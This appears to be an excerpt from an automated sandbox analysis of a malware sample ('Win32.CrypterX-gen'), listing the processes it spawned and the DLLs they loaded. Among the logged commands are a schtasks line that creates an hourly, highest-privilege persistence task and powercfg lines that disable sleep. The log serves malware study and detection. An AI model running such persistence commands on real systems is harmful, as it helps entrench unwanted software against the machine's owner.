                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
                              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe" Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
                              Source: C:\Windows\explorer.exeProcess created: unknown unknown
                              Source: C:\Windows\explorer.exeProcess created: unknown unknown
                              Source: C:\Windows\explorer.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: mscorjit.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: rsaenh.dllJump to behavior
